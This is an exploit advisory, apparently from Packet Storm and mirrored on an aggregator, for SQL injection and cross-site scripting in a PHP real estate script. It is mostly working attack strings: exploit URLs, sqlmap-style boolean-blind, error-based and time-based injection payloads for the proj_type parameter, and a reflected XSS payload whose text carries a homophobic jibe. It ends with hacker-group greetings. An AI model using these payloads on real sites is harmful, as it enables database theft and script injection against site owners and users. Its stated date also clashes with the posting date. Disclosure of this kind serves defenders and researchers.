Readymade Real Estate Script SQL Injection / Cross Site Scripting
2024-7-31 22:20:16 Author: packetstormsecurity.com(查看原文) 阅读量:7 收藏

[x]========================================================================================================================================[x]
| Title : Readymade Real Estate Script Blind SQL & XSS Vulnerabilities
| Software : Advanced Real Estate Script
| Last Update : 12/07/24
| First Release: 25/01/22
| Vendor : http://www.i-netsolution.com/
| Date : 30 Agustus 2024
| Author : OoN_Boy
[x]========================================================================================================================================[x]
| Technology : PHP
| Database : MySQL
| Price : $100
| Description : The real estate market is full of interesting business opportunities. A few years back, it can be said that this industry is hardly responsive to innovation
[x]========================================================================================================================================[x]

[O] Exploit

http://localhost/advance-realestate/search-results.php?Projectmain=&bedrooms=&maxprice=&proj_type=[SQL]&search=r00t&searchtext=&sell_price=111
http://localhost/advance-realestate/search-results.php?Projectmain=&bedrooms=&maxprice=&proj_type=[XSS]&search=r00t&searchtext=&sell_price=111

[O] Proof of concept

[SQL]
Parameter: proj_type (GET)
Type: boolean-based blind
Title: OR boolean-based blind - WHERE or HAVING clause (NOT - MySQL comment)
Payload: Projectmain=&proj_type=%' OR NOT 7852=7852#&searchtext=&sell_price=111&maxprice=&bedrooms=&search=r00t

Type: error-based
Title: MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET)
Payload: Projectmain=&proj_type=%' AND GTID_SUBSET(CONCAT(0x7162706a71,(SELECT (ELT(7736=7736,1))),0x7178717871),7736) AND 'jCym%'='jCym&searchtext=&sell_price=111&maxprice=&bedrooms=&search=r00t

Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: Projectmain=&proj_type=%' AND (SELECT 6632 FROM (SELECT(SLEEP(5)))NRLb) AND 'IbJm%'='IbJm&searchtext=&sell_price=111&maxprice=&bedrooms=&search=r00t

[XSS]
http://localhost/advance-realestate/advance-realestate/search-results.php?Projectmain=&bedrooms=&maxprice=&proj_type='"><img/src/onerror=.1|alert`HOMODETECTED!!!`+class=VrsHckHomo>&search=r00t&searchtext=&sell_price=111

[x]========================================================================================================================================[x]

[O] Greetz

BatamHacker, Vrs-hCk, c0li, h4ntu, Opay, Ndet, Ipay, Paman, NoGe, H312Y, dono, pizzyroot, zxvf, Joe Chawanua, k0rea [Ntc],xx_user, s3t4n, Angela Chang, IrcMafia, str0ke, em|nem, Pandoe, Ronny ^s0n g0ku^

[x]========================================================================================================================================[x]


文章来源: https://packetstormsecurity.com/files/179858/readymaderes-sqlxss.txt
如有侵权请联系:admin#unsafe.sh